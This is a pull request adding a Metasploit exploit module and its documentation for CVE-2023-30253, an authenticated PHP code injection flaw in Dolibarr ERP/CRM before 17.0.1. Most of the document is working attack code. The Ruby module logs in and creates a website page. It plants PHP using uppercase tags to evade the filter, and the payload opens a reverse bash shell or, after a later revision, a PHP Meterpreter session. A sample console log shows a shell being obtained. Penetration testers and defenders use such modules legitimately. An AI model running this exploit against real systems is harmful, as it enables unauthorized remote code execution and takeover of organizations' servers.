### PR TITLE
Add Dolibarr ERP/CRM authenticated RCE module (CVE-2023-30253)

### DIFF
--- a/documentation/modules/exploit/unix/http/dolibarr_cms_rce_cve_2023_30253.md
+++ b/documentation/modules/exploit/unix/http/dolibarr_cms_rce_cve_2023_30253.md
@@ -1,0 +1,86 @@
+## Vulnerable Application
+
+Dolibarr ERP/CRM versions prior to 17.0.1 are vulnerable. The Website
+module must be enabled and the attacker must have valid credentials.
+
+### Docker setup (recommended)
+
+```yaml
+services:
+  mariadb:
+    image: mariadb:10.6
+    command: --character-set-server=utf8 --collation-server=utf8_unicode_ci
+    environment:
+      - MYSQL_ROOT_PASSWORD=rootpassword
+      - MYSQL_USER=dolibarr
+      - MYSQL_PASSWORD=dolipassword
+      - MYSQL_DATABASE=dolibarr
+    volumes:
+      - ./db_data:/var/lib/mysql
+  dolibarr:
+    image: tuxgasy/dolibarr:17.0.0
+    depends_on:
+      - mariadb
+    ports:
+      - "8080:80"
+    environment:
+      - DOLI_DB_HOST=mariadb
+      - DOLI_DB_NAME=dolibarr
+      - DOLI_DB_USER=dolibarr
+      - DOLI_DB_PASSWORD=dolipassword
+      - DOLI_ADMIN_LOGIN=admin
+      - DOLI_ADMIN_PASSWORD=admin
+    volumes:
+      - ./dolibarr_docs:/var/www/documents
+      - ./dolibarr_custom:/var/www/html/custom
+```
+
+Run with `docker-compose up -d`, then navigate to **Home -> Setup -> Company/Organization**
+to create a company. Finally, enable the Website module under
+**Home -> Setup -> Modules/Applications -> Website**.
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use exploit/unix/http/dolibarr_cms_rce_cve_2023_30253`
+3. `set RHOSTS <target>`
+4. `set USERNAME admin`
+5. `set PASSWORD admin`
+6. `set RPORT 8080`
+7. `set LHOST <your ip>`
+8. `run`
+9. A reverse shell session should open
+
+## Options
+
+| Option | Required | Description |
+|--------|----------|-------------|
+| RHOSTS | Yes | Target address |
+| RPORT | Yes | Target port (default: 80) |
+| USERNAME | Yes | Dolibarr username (default: admin) |
+| PASSWORD | Yes | Dolibarr password (default: admin) |
+| TARGETURI | Yes | Base path to Dolibarr (default: /) |
+| LHOST | Yes | Your IP for the reverse shell |
+
+## Scenarios
+
+### Dolibarr 17.0.0 on Linux (Docker)
+
+```
+msf > use exploit/unix/http/dolibarr_cms_rce_cve_2023_30253
+msf exploit(unix/http/dolibarr_cms_rce_cve_2023_30253) > set RHOSTS 192.168.0.100
+msf exploit(unix/http/dolibarr_cms_rce_cve_2023_30253) > set LHOST 192.168.0.100
+msf exploit(unix/http/dolibarr_cms_rce_cve_2023_30253) > set RPORT 8080
+msf exploit(unix/http/dolibarr_cms_rce_cve_2023_30253) > run
+
+[*] Started reverse TCP handler on 192.168.0.100:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Vulnerable version detected: 17.0.0
+[+] Successfully authenticated to Dolibarr
+[+] Website 'emaqmwjv' created
+[+] Page 'jqigdr' created with ID 2
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[+] Payload injected, triggering...
+[*] Command shell session 2 opened (192.168.0.100:4444 -> 192.168.0.100:47610) at 2026-04-22 22:50:39 +0200
+[+] Website 'emaqmwjv' deleted
+```

--- a/modules/exploits/unix/http/dolibarr_cms_rce_cve_2023_30253.rb
+++ b/modules/exploits/unix/http/dolibarr_cms_rce_cve_2023_30253.rb
@@ -1,0 +1,340 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Dolibarr ERP/CRM Authenticated Code Injection',
+        'Description' => %q{
+          Dolibarr ERP/CRM before 17.0.1 allows remote code execution by an
+          authenticated user who has access to the Website module. The
+          application filters lowercase `<?php` tags to prevent PHP code
+          injection in website page content, but this check can be bypassed
+          by using an uppercase variant such as `<?PHP`. This
+          allows injecting arbitrary PHP code that is executed when the
+          website page is rendered. Versions prior to 17.0.1 are known to
+          be vulnerable. The vulnerability was fixed in version 17.0.1.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Tinexta Cyber Offensive Security Team', # Discovery
+          'Emanuele Cervelli'                      # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2023-30253'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-30253'],
+          ['URL', 'https://www.swascan.com/security-advisory-dolibarr-17-0-0/']
+        ],
+        'Platform' => ['unix'],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ]
+        ],
+        'DisclosureDate' => '2023-05-29',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('USERNAME', [true, 'Dolibarr username', 'admin']),
+        OptString.new('PASSWORD', [true, 'Dolibarr password', 'admin']),
+        OptString.new('TARGETURI', [true, 'Base path to Dolibarr', '/'])
+      ]
+    )
+  end
+
+  def referer(path)
+    "http://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{normalize_uri(target_uri.path, path)}"
+  end
+
+  def get_csrf_token(path, referer: nil)
+    headers = {}
+    headers['Referer'] = referer if referer
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, path),
+      'method' => 'GET',
+      'keep_cookies' => true,
+      'headers' => headers
+    )
+
+    return nil if res.nil?
+
+    html = res.get_html_document
+    token_meta = html.at('meta[@name="anti-csrf-newtoken"]')
+    return token_meta['content'] if token_meta
+
+    token_input = html.at('input[@name="token"]')
+    return token_input['value'] if token_input
+
+    nil
+  end
+
+  def login
+    token = get_csrf_token('index.php')
+    fail_with(Failure::UnexpectedReply, 'Could not retrieve CSRF token from login page') if token.nil?
+
+    vprint_status("Attempting login as #{datastore['USERNAME']}")
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'headers' => {
+        'Referer' => referer('index.php')
+      },
+      'vars_post' => {
+        'token' => token,
+        'actionlogin' => 'login',
+        'loginfunction' => 'loginfunction',
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      }
+    )
+
+    fail_with(Failure::Unreachable, 'No response received during login') if res.nil?
+    fail_with(Failure::NoAccess, 'Login failed - invalid credentials') if res.body.include?('Bad value for login or password')
+
+    print_good('Successfully authenticated to Dolibarr')
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'method' => 'GET'
+    )
+
+    return CheckCode::Unknown('Could not connect to web service - no response') if res.nil?
+    return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200
+    return CheckCode::Safe('Target does not appear to be running Dolibarr') unless res.body.downcase.include?('dolibarr')
+
+    version = nil
+    if res.body =~ /Dolibarr\s+(\d+\.\d+\.\d+)/i
+      version = ::Regexp.last_match(1)
+    end
+
+    if version
+      ver = Rex::Version.new(version)
+      if ver < Rex::Version.new('17.0.1')
+        return CheckCode::Appears("Vulnerable version detected: #{version}")
+      else
+        return CheckCode::Safe("Not vulnerable, version detected: #{version}")
+      end
+    end
+
+    CheckCode::Detected('Dolibarr detected but version could not be determined')
+  end
+
+  def create_website
+    @website_name = Rex::Text.rand_text_alpha_lower(8)
+    vprint_status("Creating website: #{@website_name}")
+    token = get_csrf_token('website/index.php', referer: referer('website/index.php'))
+
+    fail_with(Failure::UnexpectedReply, 'Could not get CSRF token for website creation') if token.nil?
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'website/index.php'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'headers' => { 'Referer' => referer('website/index.php') },
+      'vars_post' => {
+        'token' => token,
+        'action' => 'addsite',
+        'website' => '-1',
+        'WEBSITE_REF' => @website_name,
+        'WEBSITE_LANG' => 'en',
+        'addcontainer' => 'Create'
+      }
+    )
+
+    fail_with(Failure::Unreachable, 'No response when creating website') if res.nil?
+    fail_with(Failure::NotVulnerable, 'Website module is not enabled') if res.body.include?('Access denied')
+
+    print_good("Website '#{@website_name}' created")
+    @website_created = true
+  end
+
+  def create_page
+    @page_name = Rex::Text.rand_text_alpha_lower(6)
+    vprint_status("Creating page: #{@page_name}")
+    token = get_csrf_token('website/index.php', referer: referer('website/index.php'))
+    fail_with(Failure::UnexpectedReply, 'Could not get CSRF token for page creation') if token.nil?
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'website/index.php'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'headers' => { 'Referer' => referer('website/index.php') },
+      'vars_post' => {
+        'token' => token,
+        'action' => 'addcontainer',
+        'website' => @website_name,
+        'radiocreatefrom' => 'checkboxcreatemanually',
+        'WEBSITE_TYPE_CONTAINER' => 'page',
+        'sample' => 'empty',
+        'WEBSITE_TITLE' => @page_name,
+        'WEBSITE_PAGENAME' => @page_name,
+        'WEBSITE_LANG' => 'en',
+        'addcontainer' => 'Create'
+      }
+    )
+
+    fail_with(Failure::Unreachable, 'No response when creating page') if res.nil?
+    fail_with(Failure::UnexpectedReply, "Unexpected response code: #{res.code}") unless res.code == 200
+
+    html = res.get_html_document
+    page_option = html.at('select[@name="pageid"] option[selected]')
+    fail_with(Failure::UnexpectedReply, 'Could not find page ID') if page_option.nil?
+
+    @page_id = page_option['value']
+    fail_with(Failure::UnexpectedReply, 'Could not find page ID') if @page_id.to_s.empty?
+
+    print_good("Page '#{@page_name}' created with ID #{@page_id}")
+  end
+
+  def inject_and_trigger
+    token = get_csrf_token('website/index.php', referer: referer('website/index.php'))
+    fail_with(Failure::UnexpectedReply, 'Could not get CSRF token') if token.nil?
+
+    page_content = %(<section id="mysection1" contenteditable="true"><?PHP system("#{payload.encoded}"); ?></section>)
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'website/index.php'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'headers' => { 'Referer' => referer('website/index.php') },
+      'vars_post' => {
+        'token' => token,
+        'backtopage' => '',
+        'dol_openinpopup' => '',
+        'action' => 'updatesource',
+        'website' => @website_name,
+        'pageid' => @page_id,
+        'update' => 'Save',
+        'PAGE_CONTENT' => page_content
+      }
+    )
+
+    fail_with(Failure::Unreachable, 'No response when injecting payload') if res.nil?
+
+    print_good('Payload injected, triggering...')
+
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'public', 'website', 'index.php'),
+      'method' => 'GET',
+      'vars_get' => {
+        'website' => @website_name,
+        'pageref' => @page_name
+      }
+    }, 5)
+  end
+
+  def get_website_id
+    token = get_csrf_token('website/index.php', referer: referer('website/index.php'))
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'website/index.php'),
+      'method' => 'GET',
+      'keep_cookies' => true,
+      'headers' => { 'Referer' => referer('website/index.php') },
+      'vars_get' => {
+        'action' => 'deletesite',
+        'token' => token,
+        'website' => @website_name
+      }
+    )
+
+    return nil if res.nil?
+
+    match = res.body.match(%r{/website/index\.php\?id=(\d+)&action=confirm_deletesite})
+    return match[1] if match
+
+    nil
+  end
+
+  def delete_page
+    token = get_csrf_token('website/index.php', referer: referer('website/index.php'))
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'website/index.php'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'headers' => { 'Referer' => referer('website/index.php') },
+      'vars_post' => {
+        'token' => token,
+        'backtopage' => '',
+        'website' => @website_name,
+        'pageid' => @page_id,
+        'delete' => 'Delete'
+      }
+    )
+  end
+
+  def delete_website
+    website_id = get_website_id
+    return if website_id.nil?
+
+    token = get_csrf_token('website/index.php', referer: referer('website/index.php'))
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'website/index.php'),
+      'method' => 'GET',
+      'keep_cookies' => true,
+      'headers' => { 'Referer' => referer('website/index.php') },
+      'vars_get' => {
+        'id' => website_id,
+        'action' => 'confirm_deletesite',
+        'confirm' => 'yes',
+        'token' => token,
+        'delete_also_js' => '',
+        'delete_also_medias' => ''
+      }
+    )
+  end
+
+  def cleanup
+    return unless @website_created
+
+    begin
+      vprint_status("Cleaning up website '#{@website_name}'")
+      delete_page if @page_id
+      delete_website
+      print_good("Website '#{@website_name}' deleted")
+    rescue ::Rex::ConnectionError, ::Rex::ConnectionTimeout => e
+      print_warning("Cleanup failed: #{e.message}")
+    end
+
+    super
+  end
+
+  def exploit
+    login
+    create_website
+    create_page
+
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    inject_and_trigger
+  end
+end

--- a/modules/exploits/unix/http/dolibarr_cms_rce_cve_2023_30253.rb
+++ b/modules/exploits/unix/http/dolibarr_cms_rce_cve_2023_30253.rb
@@ -69,7 +69,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def referer(path)
-    "http://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{normalize_uri(target_uri.path, path)}"
+    proto = datastore['SSL'] ? 'https' : 'http'
+    "#{proto}://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{normalize_uri(target_uri.path, path)}"
   end
 
   def get_csrf_token(path, referer: nil)
@@ -157,7 +158,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, 'Could not get CSRF token for website creation') if token.nil?
 
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'website/index.php'),
+      'uri' => normalize_uri(target_uri.path, 'website', 'index.php'),
       'method' => 'POST',
       'keep_cookies' => true,
       'headers' => { 'Referer' => referer('website/index.php') },
@@ -185,7 +186,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, 'Could not get CSRF token for page creation') if token.nil?
 
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'website/index.php'),
+      'uri' => normalize_uri(target_uri.path, 'website', 'index.php'),
       'method' => 'POST',
       'keep_cookies' => true,
       'headers' => { 'Referer' => referer('website/index.php') },
@@ -220,10 +221,11 @@ class MetasploitModule < Msf::Exploit::Remote
     token = get_csrf_token('website/index.php', referer: referer('website/index.php'))
     fail_with(Failure::UnexpectedReply, 'Could not get CSRF token') if token.nil?
 
-    page_content = %(<section id="mysection1" contenteditable="true"><?PHP system("#{payload.encoded}"); ?></section>)
+    section_id = Rex::Text.rand_text_alpha_lower(8)
+    page_content = %(<section id="#{section_id}" contenteditable="true"><?PHP system("#{payload.encoded}"); ?></section>)
 
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'website/index.php'),
+      'uri' => normalize_uri(target_uri.path, 'website', 'index.php'),
       'method' => 'POST',
       'keep_cookies' => true,
       'headers' => { 'Referer' => referer('website/index.php') },
@@ -256,7 +258,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def get_website_id
     token = get_csrf_token('website/index.php', referer: referer('website/index.php'))
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'website/index.php'),
+      'uri' => normalize_uri(target_uri.path, 'website', 'index.php'),
       'method' => 'GET',
       'keep_cookies' => true,
       'headers' => { 'Referer' => referer('website/index.php') },
@@ -278,7 +280,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def delete_page
     token = get_csrf_token('website/index.php', referer: referer('website/index.php'))
     send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'website/index.php'),
+      'uri' => normalize_uri(target_uri.path, 'website', 'index.php'),
       'method' => 'POST',
       'keep_cookies' => true,
       'headers' => { 'Referer' => referer('website/index.php') },
@@ -298,7 +300,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     token = get_csrf_token('website/index.php', referer: referer('website/index.php'))
     send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'website/index.php'),
+      'uri' => normalize_uri(target_uri.path, 'website', 'index.php'),
       'method' => 'GET',
       'keep_cookies' => true,
       'headers' => { 'Referer' => referer('website/index.php') },
@@ -314,6 +316,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def cleanup
+    super
+
     return unless @website_created
 
     begin
@@ -324,8 +328,6 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue ::Rex::ConnectionError, ::Rex::ConnectionTimeout => e
       print_warning("Cleanup failed: #{e.message}")
     end
-
-    super
   end
 
   def exploit

--- a/modules/exploits/unix/http/dolibarr_cms_rce_cve_2023_30253.rb
+++ b/modules/exploits/unix/http/dolibarr_cms_rce_cve_2023_30253.rb
@@ -34,17 +34,20 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-30253'],
           ['URL', 'https://www.swascan.com/security-advisory-dolibarr-17-0-0/']
         ],
-        'Platform' => ['unix'],
-        'Arch' => [ARCH_CMD],
+        'Platform' => ['php'],
+        'Arch' => [ARCH_PHP],
         'Privileged' => false,
         'Targets' => [
           [
-            'Unix Command',
+            'PHP Meterpreter',
             {
-              'Platform' => 'unix',
-              'Arch' => ARCH_CMD,
-              'Type' => :unix_cmd,
-              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'Type' => :php,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+                'Encoder' => 'php/base64'
+              }
             }
           ]
         ],
@@ -222,7 +225,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, 'Could not get CSRF token') if token.nil?
 
     section_id = Rex::Text.rand_text_alpha_lower(8)
-    page_content = %(<section id="#{section_id}" contenteditable="true"><?PHP system("#{payload.encoded}"); ?></section>)
+    page_content = %(<section id="#{section_id}" contenteditable="true"><?PHP #{payload.encoded}; ?></section>)
 
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'website', 'index.php'),


### PR DESCRIPTION
Adds an exploit module for CVE-2023-30253, an authenticated PHP code injection vulnerability in Dolibarr ERP/CRM before 17.0.1. The module bypasses the PHP tag filter using uppercase tags and achieves RCE via the Website module.

Tested against Dolibarr 17.0.0 and 14.0.0 on Linux (Docker).

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/unix/http/dolibarr_cms_rce_cve_2023_30253`
- [ ] `set RHOSTS <target>`
- [ ] `set LHOST <your ip>`
- [ ] `set USERNAME admin`
- [ ] `set PASSWORD admin`
- [ ] `run`
- [ ] **Verify** a reverse shell session opens
- [ ] **Verify** the created website is deleted after the session opens
- [ ] **Verify** the module aborts cleanly if the Website module is disabled
- [ ] **Document** the module documentation is available via `info -d`

## Setup
See the documentation file for Docker setup instructions:
`documentation/modules/exploit/unix/http/dolibarr_cms_rce_cve_2023_30253.md`